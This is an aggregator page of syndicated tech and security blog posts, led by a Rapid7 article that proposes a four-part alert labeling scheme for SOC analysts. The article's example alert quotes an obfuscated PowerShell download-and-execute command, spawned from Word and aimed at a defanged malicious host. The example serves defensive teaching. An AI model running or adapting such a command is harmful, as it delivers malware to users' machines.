Don’t Be Afraid to Ask

However you’d like to join us, we’re here to help. So—shameless plug alert—please don’t hesitate to contact our Sales team to talk about how to best start saving with B2 Cloud Storage.

The post On-prem to Cloud, Faster: Meet Our Newest Fireball appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/845999/rss

Security updates have been issued by Arch Linux (ansible, chromium, cups, docker, firefox, gitlab, glibc, helm, lib32-glibc, minio, nextcloud, opendoas, opera, php, php7, privoxy, python-django, python-jinja, python2-jinja, thunderbird, vivaldi, and wireshark-cli), Fedora (jasper, linux-firmware, php, python-cryptography, spice-vdagent, subversion, and thunderbird), Mageia (gssproxy and phpldapadmin), openSUSE (chromium, containerd, docker, docker-runc,, librepo, nextcloud, and privoxy), SUSE (containerd, docker, docker-runc, golang-github-docker-libnetwork, kernel, openvswitch, and wpa_supplicant), and Ubuntu (wpa).

Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/

Talkin’ SMAC: Alert Labeling and Why It Matters

If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is often rendered useless because the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it the malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
Talkin’ SMAC: Alert Labeling and Why It Matters

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example,  let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?

What if it’s not a threat?

However, what if upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]com command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.

Talkin’ SMAC: Alert Labeling and Why It Matters

A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!.” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting our labels to only one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we have to now do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.

Talkin’ SMAC: Alert Labeling and Why It Matters

Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want to know:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing?’” The machine learning (ML) model can only learn from the labels it is given. Talkin’ SMAC: Alert Labeling and Why It MattersIf the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefits of having statistically meaningful data outweighs the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for automated rules engines and automations. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing, but can be more specifically tailored to more complex combinations of labels.

Why should we care about this?

Imagine a world when SOC analysts don’t have to waste time reviewing obvious false positives, or repetitive commodity malware. Imagine a world where SOC analysts only tackle the interesting questions—new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.

Talkin’ SMAC: Alert Labeling and Why It Matters

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/02/12/new-insightvm-dashboard-helps-you-discover-significant-changes-in-your-environment-from-the-past-30-days/

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Organizations are in a constant struggle to identify and reduce risks in their constantly changing environments. These changes may manifest by several means and can be recurring events.

For example:

  1. Laptops and other devices are commissioned or decommissioned due to changes in the workforce.
  2. Your security tool discovers that assets in your environment contain several vulnerabilities recently discovered by researchers.
  3. New software or services are deployed to your organization that introduce new risk via new vulnerabilities.
  4. Your IT team deployed a round of patches to local assets, which significantly decreased the number of vulnerabilities in your environment.

The obvious challenge here is that these changes create moving targets and security teams need to quickly identify, prioritize and remediate risk as it’s introduced. We developed our Significant Changes in the Last 30 Days dashboard in InsightVM in order to provide a lens through which we can highlight the differences in your environment from the past 30 days to present day, as well as the ability to pivot the findings into a Remediation Project directly from the dashboard.

Users may easily create this dashboard by selecting the template titled “Significant Changes in the Last 30 days.” This action will create a local copy of the dashboard for you and save three new asset queries in your query library. These queries are:

  • Assets Discovered in the Last 30 Days,
  • Critical Vulnerabilities Discovered in the Last 30 Days
  • Vulnerabilities Discovered in the Last 30 Days

These queries all filter the cards on the dashboard, and we’ve added the ability to view the queries applied to this Dashboard, which will allow you to further focus the finding on the dashboard.

Users are completely able to add and remove cards as they wish. However, the following cards are included in the template:

This card shows the total number of assets in your environment, as well as the total number of new assets in the past 30 days and the total percentage of increase.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Number of Critical Vulnerabilities Found in the Last 30 Days

These are the total number of vulnerabilities with a severity of “critical” found within the last 30 days of the current date.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Number of Exploitable Critical Vulnerabilities Found in the Last 30 Days

This card shows all vulnerabilities with a severity of critical and known exploits. These provide a powerful view into vulnerabilities attackers could easily exploit.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

New vs. Remediated Vulnerabilities

This card shows the number and percentage of new, remediated, and unchanged vulnerability findings. This is powerful in showing which vulns in your environment have been addressed, which are new, and which have remained static.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets by Risk and Vulnerabilities Found in the Last 30 Days

This visualization helps you identify the riskiest assets in your environment based on the number of vulnerabilities and the associated risk score. The size of the bubbles indicates how many assets exist for a given vulnerability count and risk score range.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Vulnerabilities by CVSS Score

This card shows the vulnerabilities found in your environment in the past 30 days grouped by CVSS score range (e.g., CVSS 7.0–10).

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Newly Discovered Vulnerabilities by Total Risk Score

This card allows users to leverage our Real Risk score in order to identify and prioritize vulnerabilities discovered in the past 30 days.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets With Actively Targeted Vulnerabilities

This card is intended to enable users to identify vulnerabilities that are actively being targeted in the wild, and therefore presenting a great degree of risk.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets by Number of Running Containers

This card is intended to identify risk exposure by showing container hosts and the total number of containers running on these.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Top Riskiest Assets

This card lists the riskiest assets discovered in the past 30 days, allowing teams to prioritize remediations that will help reduce risk quickly.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Most Common Software

This card shows the software most commonly used in their environment, allowing teams to prioritize their efforts at those items with the greatest surface area.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Most Common Services

This card shows the services most commonly deployed in their environment, giving them insight into what could be of the most importance.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

New Vulnerability Findings

This card shows the total number of vulnerability findings  discovered in the past 30 days, and expanding this view shows a list of these. This allows teams to identify recent vulnerabilities and prioritize those accordingly.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Remediated Vulnerability Findings

Finally, some positive news. This card demonstrates remediated vulnerabilities in the past 30 days, and this allows teams to demonstrate their progress on a monthly basis.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Per usual, users are able to arrange cards per their desires as well as share these with team members. We think this dashboard has the potential to provide deep visibility into changes in their environments and we hope this will help drive customers to a safer state.

Not an InsightVM customer? Watch this on-demand demo to see our vulnerability risk management solution in action.

Watch Now

Attack against Florida Water Treatment Facility

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/attack-against-florida-water-treatment-facility.html

A water treatment plant in Oldsmar, Florida, was attacked last Friday. The attacker took control of one of the systems, and increased the amount of sodium hydroxide — that’s lye — by a factor of 100. This could have been fatal to people living downstream, if an alert operator hadn’t noticed the change and reversed it.

We don’t know who is behind this attack. Despite its similarities to a Russian attack of a Ukrainian power plant in 2015, my bet is that it’s a disgruntled insider: either a current or former employee. It just doesn’t make sense for Russia to be behind this.

ArsTechnica is reporting on the poor cybersecurity at the plant:

The Florida water treatment facility whose computer system experienced a potentially hazardous computer breach last week used an unsupported version of Windows with no firewall and shared the same TeamViewer password among its employees, government officials have reported.

Brian Krebs points out that the fact that we know about this attack is what’s rare:

Spend a few minutes searching Twitter, Reddit or any number of other social media sites and you’ll find countless examples of researchers posting proof of being able to access so-called “human-machine interfaces” — basically web pages designed to interact remotely with various complex systems, such as those that monitor and/or control things like power, water, sewage and manufacturing plants.

And yet, there have been precious few known incidents of malicious hackers abusing this access to disrupt these complex systems. That is, until this past Monday, when Florida county sheriff Bob Gualtieri held a remarkably clear-headed and fact-filled news conference about an attempt to poison the water supply of Oldsmar, a town of around 15,000 not far from Tampa.

От екопротеста пред Дондуков 2 Raiffeisen и Ревизоро срещу еколозите и Камчийските пясъци

Post Syndicated from Николай Марченко original https://bivol.bg/raiffeisen-%D0%B8-%D1%80%D0%B5%D0%B2%D0%B8%D0%B7%D0%BE%D1%80%D0%BE-%D1%81%D1%80%D0%B5%D1%89%D1%83-%D0%B5%D0%BA%D0%BE%D0%BB%D0%BE%D0%B7%D0%B8%D1%82%D0%B5-%D0%B8-%D0%BA%D0%B0%D0%BC%D1%87%D0%B8%D0%B9.html

петък 12 февруари 2021


Десетки граждани и активисти се събраха под прозорците на премиера Бойко Борисов в сряда на екопротест в защита на Камчийски пясъци. Организатори на събитието бяха активистите от “За да остане…

Visual Studio Code comes to Raspberry Pi

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/visual-studio-code-comes-to-raspberry-pi/

Microsoft’s Visual Studio Code is an excellent C development environment, and now it’s an easy install on Raspberry Pi. Here’s Jim Bennett from Microsoft to show you all how to get VS Code up and running on our tiny computer. Take it away, Jim…

There are a few products in the tech sphere that get me really excited. One of them is Raspberry Pi (obviously), and the other is Visual Studio Code or VS Code. I always hoped that the two would come together one day — and now, to my great pleasure, they have!

VS Code is a free, open source developer text editor originally released for Windows, macOS and x64 Linux. Out of the box it supports generic text editing and git source code control, as well as full web development with JavaScript, TypeScript and Node.js, with debugging, intellisense and all the goodness you’d expect from a full-featured IDE. What makes it super powerful is extensions — bringing a huge range of programming languages, developer tools and other capabilities.

For example my VS Code setup includes a Python extension so I can code and debug in Python, a set of Microsoft Azure extensions so I can manage my cloud services, PlatformIO to allow me to program micro-controllers like Arduino boards coupled with a C++ extension to support coding in C and C++, and even some Docker support. Not a bad setup for a completely free developer tool.

Jim’s Raspberry Pi 400 running VS Code

I’ve been hoping for years VS Code would come to Raspberry Pi, and finally it’s here. As well as supporting Debian Linux on x64, there are now builds for ARM and ARM64 – both of which can run on Raspberry Pi OS (the ARM build on Raspberry Pi OS, the ARM64 on the beta of the 64-bit Raspberry Pi OS). And yes — I am writing this right now on a Raspberry Pi 400 running VS Code!

Why am I so excited about this?

Well, there are a couple of reasons.

Firstly, it brings an exceptional developer tool to Raspberry Pi. There are already some great editors, but nothing of the calibre of VS Code. I can take my $35 computer, plug it into a keyboard and mouse, connect a monitor and a TV and code in a wide range of languages from the same place.

I see kids learning Python at school using one tool, then learning web development in an after-school coding club with a different tool. They can now do both in the same application, reducing the cognitive load – they only have to learn one tool, one debugger, one setup. Combine this with the new Raspberry Pi 400 and you have an all-in-one solution to learning to code, reminiscent of my ZX Spectrum of decades ago, but so much more powerful.

The second reason is to me the most important — it allows kids to share the same development environment as their grown-ups. Imagine the joy of a 10-year-old coding Python using VS Code on their Raspberry Pi plugged into the family TV, then seeing their Mum working from home coding Python in exactly the same tool on her work laptop as part of her job as an AI engineer or data scientist. It also makes it easier when Mum has to inevitably help with unblocking the issues that always come up with learners.

As a young child it was mind-blowing when my Dad brought home a work PC so he could write reports and I could use it to write up my school work – I was using what Dad used at work, making me feel important. I see this with my seven-year-old daughter, seeing her excitement that I use Microsoft Teams for work, the same as she uses for her virtual schooling (she’s even offered to teach me how to use it if I get stuck). To be able to bring that unadulterated joy of using ‘grown-up tools’ to our young learners is priceless.

Installing VS Code

The great news is VS Code is now available as part of the Raspberry Pi OS apt packages. Launch the Raspberry Pi Terminal and run the following commands:

sudo apt update 
sudo apt install code -y

This will download and install VS Code. If you’ve got your hands on a Pico, then you may not even need to do this – VS Code is installed as part of the Pico setup from the Getting Started guide.

After installing VS Code, you can run it from the Programming folder in the Raspberry Pi menu.

Getting started with VS Code

VS Code may seem daunting at first – it’s a powerful tool with a huge range of extensions. The good news is Microsoft has you covered with lots of hands-on, self-guided learning guides on how to use it with different languages and development tools, from using Git version control, to developing web applications — there’s even a guide to learning Python basics with Wonder Woman.

Go grab it and happy coding!

Jim with his arms folded wearing a dark t shirt
There he is – that’s the real life Jim!

Brilliant Jim Bennett shares loads of Raspberry Pi builds and tutorials over on Expecting Someone Geekier and tweets @jimbobbennett. He also works in Developer Relations at Microsoft. You can learn pretty much everything there is to know about him on github.

The post Visual Studio Code comes to Raspberry Pi appeared first on Raspberry Pi.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close